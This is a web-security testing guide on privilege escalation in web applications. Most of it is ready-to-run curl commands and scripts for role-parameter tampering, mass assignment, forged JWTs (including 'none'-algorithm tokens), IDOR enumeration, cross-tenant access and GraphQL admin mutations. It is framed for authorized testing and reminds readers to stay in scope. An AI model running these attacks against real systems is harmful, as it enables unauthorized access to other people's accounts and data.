Privilege Escalation

Escalate privileges within web applications to access higher-level functionality, administrative features, and sensitive data beyond your initial access level.

Stay in Scope

Document all privilege escalation attempts. Never access data or functionality outside the authorized scope, even if technically possible.

📈 Privilege Escalation Types

Vertical Escalation: Gaining higher-privilege roles (user → admin)
Horizontal Escalation: Accessing other users' data at the same privilege level
Context Escalation: Breaking out of restricted application contexts or sandboxes
Function Escalation: Accessing disabled or hidden functionality

Tools & Resources

Burp Suite

Test authorization controls

burpsuite Docs →

Autorize

Automated authorization testing

Burp BApp Store GitHub →

AuthMatrix

Multi-user auth matrix testing

Burp BApp Store GitHub →

ffuf

Fast web fuzzer for hidden endpoints

go install ffuf/v2@latest GitHub →

Vertical Privilege Escalation

Parameter Manipulation

Test for privilege escalation by manipulating role and permission parameters.

parameter_manipulation.sh
bash 
# Common privilege escalation parameters
# Test each parameter with elevated values

# Role parameters
role=admin
role=administrator
role=superuser
role=1 (if numeric)
isAdmin=true
admin=1
user_role=admin

# Permission parameters
access_level=admin
permission=full
level=9999
privileges=all

# User type parameters
user_type=admin
type=administrator
account_type=premium

# Burp request modification
POST /api/user/update HTTP/1.1
Host: target.com
Content-Type: application/json

{
  "username": "attacker",
  "email": "attacker@evil.com",
  "role": "admin",          // Add role parameter
  "isAdmin": true,          // Add admin flag
  "permissions": ["*"]      // Add permissions array
}

# Test during registration
POST /api/register HTTP/1.1
{
  "username": "newuser",
  "password": "password123",
  "role": "admin"           // Mass assignment vulnerability
}

Direct Object Reference Manipulation

admin_endpoint_testing.sh
bash 
# Test accessing admin endpoints as regular user
# Save admin session cookies/tokens separately

# Admin endpoint enumeration
endpoints=(
  "/admin"
  "/admin/dashboard"
  "/admin/users"
  "/admin/settings"
  "/administrator"
  "/manage"
  "/management"
  "/console"
  "/system"
  "/internal"
  "/api/admin"
  "/api/v1/admin"
)

for endpoint in "${endpoints[@]}"; do
  echo "[*] Testing: $endpoint"
  curl -s -o /dev/null -w "%{http_code}" \
    -H "Cookie: session=USER_SESSION" \
    "https://target.com$endpoint"
done

# Test admin actions with user token
# If admin can delete users:
curl -X DELETE "https://target.com/api/users/123" \
  -H "Authorization: Bearer USER_TOKEN"

# Test function-level access control
# Admin function with user session
curl -X POST "https://target.com/api/admin/createUser" \
  -H "Cookie: session=USER_SESSION" \
  -d '{"username": "newadmin", "role": "admin"}'

JWT Role Modification

jwt_role_modification.sh
bash 
# Decode JWT and identify role claims
echo 'eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1c2VyIiwicm9sZSI6InVzZXIifQ.xxx' | \
  cut -d'.' -f2 | base64 -d
# {"sub":"user","role":"user"}

# Modify role in JWT
python3 << 'EOF'
import jwt
import base64
import json

# If you know the secret (from brute force or leak)
secret = "weak_secret"
payload = {
    "sub": "user",
    "role": "admin",  # Changed from "user"
    "iat": 1699999999,
    "exp": 1799999999
}
token = jwt.encode(payload, secret, algorithm="HS256")
print(token)

# If 'none' algorithm works
header = {"alg": "none", "typ": "JWT"}
payload = {"sub": "user", "role": "admin"}
token = base64.urlsafe_b64encode(json.dumps(header).encode()).rstrip(b'=')
token += b'.'
token += base64.urlsafe_b64encode(json.dumps(payload).encode()).rstrip(b'=')
token += b'.'
print(token.decode())
EOF

# Common JWT role claims to modify
# role, roles, groups, permissions, scope, 
# admin, is_admin, user_type, access_level

Horizontal Privilege Escalation

IDOR Testing

idor_testing.sh
bash 
# Insecure Direct Object Reference testing
# Change user IDs to access other users' data

# Numeric ID iteration
for id in {1..100}; do
  response=$(curl -s -H "Cookie: session=YOUR_SESSION" \
    "https://target.com/api/users/$id/profile")
  echo "ID $id: $(echo $response | jq -r '.username // "N/A"')"
done

# UUID prediction (if sequential or predictable)
# Test nearby UUIDs if pattern is identified

# Parameter-based IDOR
# Original: /api/orders?user_id=123 (your ID)
# Modified: /api/orders?user_id=456 (other user)

curl "https://target.com/api/orders?user_id=456" \
  -H "Cookie: session=YOUR_SESSION"

# Body parameter IDOR
curl -X POST "https://target.com/api/profile/view" \
  -H "Cookie: session=YOUR_SESSION" \
  -H "Content-Type: application/json" \
  -d '{"target_user_id": 456}'

# Filename/path IDOR
# /download?file=user_123_report.pdf
# Try: /download?file=user_456_report.pdf

# Hash/encoded ID IDOR
# Decode base64 IDs
echo 'dXNlcl8xMjM=' | base64 -d  # user_123
echo 'user_456' | base64          # Create new encoded ID

Email/Username Enumeration

email_username_idor.sh
bash 
# Access other users via email/username parameters
# Original: /api/user?email=your@email.com
# Modified: /api/user?email=victim@email.com

# Password reset IDOR
curl -X POST "https://target.com/api/password/reset" \
  -H "Content-Type: application/json" \
  -d '{"email": "victim@company.com"}'

# If token is returned or predictable, use for account takeover

# Profile access via username
curl "https://target.com/api/profile/admin" \
  -H "Cookie: session=YOUR_SESSION"

# Search functionality abuse
# Search for specific users/data you shouldn't access
curl "https://target.com/api/search?q=admin&type=users" \
  -H "Cookie: session=YOUR_SESSION"

# Bulk data access
curl "https://target.com/api/users/export?format=csv" \
  -H "Cookie: session=YOUR_SESSION"

Autorize Automated Testing

autorize_setup.txt
text 
# Using Burp Suite Autorize extension
# Setup:
# 1. Configure low-privilege user cookies
# 2. Enable Autorize
# 3. Browse as admin user
# 4. Autorize replays requests with low-priv cookies

# Configuration in Autorize:
# - Set enforcement detector (look for "admin", "403", "401")
# - Configure unauthenticated tests
# - Set scope to target domain

# Analyze results:
# - Green: Request blocked (secure)
# - Red: Request succeeded (vulnerable)
# - Yellow: Needs manual review

# Export findings to report

# AuthMatrix setup for multiple roles:
# 1. Define roles (guest, user, admin)
# 2. Add session tokens for each role
# 3. Define expected access for each endpoint
# 4. Run automated testing across all combinations

Function-Level Access Control Bypass

Hidden Functionality Discovery

hidden_function_discovery.sh
bash 
# Find hidden admin functions
# Check JavaScript for hidden endpoints
curl -s "https://target.com/app.js" | grep -Ei 'admin|delete|create|update|api'

# Source map analysis (if available)
curl -s "https://target.com/app.js.map" | jq '.sources[]'

# Wordlist-based endpoint discovery
ffuf -u "https://target.com/api/FUZZ" \
  -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
  -H "Cookie: session=USER_SESSION"

# Method switching
# If GET is blocked, try POST, PUT, PATCH, DELETE
methods=("GET" "POST" "PUT" "PATCH" "DELETE" "OPTIONS")
for method in "${methods[@]}"; do
  echo "[*] Testing $method"
  curl -X "$method" -s -o /dev/null -w "%{http_code}" \
    "https://target.com/api/admin/users"
done

# Test with different Content-Types
curl -X POST "https://target.com/api/admin/action" \
  -H "Content-Type: application/xml" \
  -d '<action>delete</action>'

Feature Flag Manipulation

feature_flag_manipulation.sh
bash 
# Manipulate feature flags to enable admin features
# Check for feature flag cookies/headers
curl -v "https://target.com/" 2>&1 | grep -i feature

# Common feature flag parameters
features=enabled
beta=true
debug=1
dev_mode=true
admin_features=true
premium=true
feature_flag=admin_dashboard

# Test in request body
curl -X POST "https://target.com/api/profile" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Test User",
    "features": {
      "admin_panel": true,
      "advanced_settings": true
    }
  }'

# Check for A/B testing parameters
curl "https://target.com/dashboard?variant=admin" \
  -H "X-Feature-Flags: admin_enabled"

# Local storage/cookie feature flags
# Inspect and modify via browser dev tools

Multi-Tenant Privilege Escalation

multi_tenant_escalation.sh
bash 
# Cross-tenant data access
# Manipulate tenant/organization identifiers

# Tenant ID in URL
# /api/tenants/123/users → /api/tenants/456/users
curl "https://target.com/api/tenants/456/users" \
  -H "Cookie: session=TENANT_123_USER"

# Tenant ID in headers
curl "https://target.com/api/data" \
  -H "X-Tenant-ID: 456" \
  -H "Cookie: session=TENANT_123_USER"

# Tenant ID in subdomain
# tenant123.app.com → tenant456.app.com
# Test if session cookie works across subdomains

# Organization switching
curl "https://target.com/api/switch-org" \
  -H "Cookie: session=YOUR_SESSION" \
  -d '{"org_id": "victim_org_id"}'

# Shared resource access
# Files, reports, or data shared between tenants
curl "https://target.com/api/shared/reports/123" \
  -H "Cookie: session=DIFFERENT_TENANT_USER"

# API key scope testing
# Test if API keys work across tenant boundaries

GraphQL Privilege Escalation

graphql_escalation.sh
bash 
# GraphQL introspection for privilege escalation
# Find admin mutations and queries

# Introspection query
curl -X POST "https://target.com/graphql" \
  -H "Content-Type: application/json" \
  -H "Cookie: session=USER_SESSION" \
  -d '{
    "query": "{ __schema { types { name fields { name } } } }"
  }'

# Look for admin types and mutations
# AdminUser, AdminMutation, createAdmin, deleteUser, etc.

# Test admin mutations as regular user
curl -X POST "https://target.com/graphql" \
  -H "Content-Type: application/json" \
  -H "Cookie: session=USER_SESSION" \
  -d '{
    "query": "mutation { createAdmin(username: "hacker") { id } }"
  }'

# Query other users' data
curl -X POST "https://target.com/graphql" \
  -H "Content-Type: application/json" \
  -H "Cookie: session=USER_SESSION" \
  -d '{
    "query": "{ user(id: 456) { email password_hash } }"
  }'

# Nested query escalation
# Access related objects you shouldn't see
curl -X POST "https://target.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{
    "query": "{ myProfile { organization { allUsers { email role } } } }"
  }'

Automated Privilege Escalation Testing

automated_authz_testing.py
python 
# Python script for automated authorization testing
import requests
from concurrent.futures import ThreadPoolExecutor

# Define user sessions
sessions = {
    'admin': 'admin_session_token',
    'user': 'user_session_token',
    'guest': None
}

# Collect endpoints from proxy logs
endpoints = [
    ('GET', '/api/users'),
    ('GET', '/api/admin/dashboard'),
    ('POST', '/api/users/create'),
    ('DELETE', '/api/users/1'),
    ('GET', '/api/settings'),
]

def test_endpoint(method, path, role, session):
    headers = {'Cookie': f'session={session}'} if session else {}
    try:
        if method == 'GET':
            r = requests.get(f'https://target.com{path}', headers=headers)
        elif method == 'POST':
            r = requests.post(f'https://target.com{path}', headers=headers, json={})
        elif method == 'DELETE':
            r = requests.delete(f'https://target.com{path}', headers=headers)
        
        return {
            'role': role,
            'method': method,
            'path': path,
            'status': r.status_code,
            'length': len(r.content)
        }
    except Exception as e:
        return {'error': str(e)}

# Test all endpoints with all roles
results = []
for method, path in endpoints:
    for role, session in sessions.items():
        result = test_endpoint(method, path, role, session)
        results.append(result)
        
        # Flag potential vulnerabilities
        if role != 'admin' and result.get('status') == 200:
            print(f'[!] POTENTIAL VULN: {role} can access {method} {path}')

# Compare admin vs user responses
# Same response = potential authorization bypass

Privilege Escalation Testing Checklist

⬆️ Vertical Escalation

  • ☐ Role/permission parameters tested
  • ☐ Admin endpoints accessible checked
  • ☐ JWT role claims manipulation tested
  • ☐ Mass assignment vulnerabilities checked
  • ☐ Hidden admin functionality discovered

↔️ Horizontal Escalation

  • ☐ IDOR on all user-specific endpoints
  • ☐ Predictable ID patterns identified
  • ☐ Email/username parameter manipulation
  • ☐ Cross-tenant access tested
  • ☐ Bulk data export access checked

🔧 Function Access

  • ☐ HTTP method switching tested
  • ☐ Content-Type variations tried
  • ☐ Feature flags enumerated and tested
  • ☐ GraphQL mutations tested
  • ☐ API versioning bypasses checked

🔄 Automated Testing

  • ☐ Autorize/AuthMatrix configured
  • ☐ All roles tested against all endpoints
  • ☐ Response comparison analysis done
  • ☐ Edge cases and boundary conditions
  • ☐ Results documented with evidence

Practice Labs

PortSwigger Access Control Labs

Comprehensive labs covering vertical and horizontal privilege escalation

Business Logic Labs

Practice exploiting business logic flaws for privilege escalation

OWASP Juice Shop

Multiple IDOR and privilege escalation challenges

crAPI (Completely Ridiculous API)

API-focused vulnerable app with authorization bypass challenges

Related Topics

IDOR Vulnerabilities

Authentication Bypass

Session Attacks

Lateral Movement

Post-Exploitation Hub